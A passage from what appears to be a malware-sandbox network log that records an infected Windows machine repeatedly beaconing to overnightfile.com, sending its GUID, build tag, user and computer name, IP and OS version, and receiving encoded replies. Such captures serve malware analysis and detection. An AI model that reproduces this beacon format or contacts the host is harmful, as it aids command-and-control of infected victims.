X-Powered-By: PHP/5.4.45
Data Ascii: cTAZGARRABw==0
Jul 14, 2020 11:21:18.911391020 CEST 818 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:19.008234978 CEST  818  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4e 4d 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFNMUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:19.344836950 CEST  819  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:19.443614960 CEST  819  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVJQEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:19.814433098 CEST  820  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:19.910614967 CEST  821  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHBYSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:20.499816895 CEST  822  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:20.595278978 CEST  822  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 46 55 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTFUGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:20.936074018 CEST  823  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:21.027698994 CEST  823  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTHSGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:21.336246967 CEST  823  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:21.427649975 CEST  824  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMMNNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:21.947421074 CEST  824  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:22.038686037 CEST  824  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHBYSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:22.383347988 CEST  825  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:22.474579096 CEST  825  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4b 50 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGKPTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:23.013705015 CEST  825  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:23.105078936 CEST  826  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZFUAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:23.421612024 CEST  826  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:23.515053034 CEST826INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKYBPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:23.847744942 CEST827OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:23.941159010 CEST827INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGMNTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:24.291476011 CEST828OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:24.382613897 CEST828INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFBYUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:24.686016083 CEST828OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:24.774272919 CEST829INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHAZSARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:25.090848923 CEST829OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:25.178890944 CEST829INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNJQMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:25.473553896 CEST830OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:25.564625025 CEST830INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQZAJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:25.890580893 CEST830OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:25.979252100 CEST831INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNZAMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:26.269500971 CEST831OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:26.358181000 CEST831INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZNMAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:26.666646004 CEST832OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
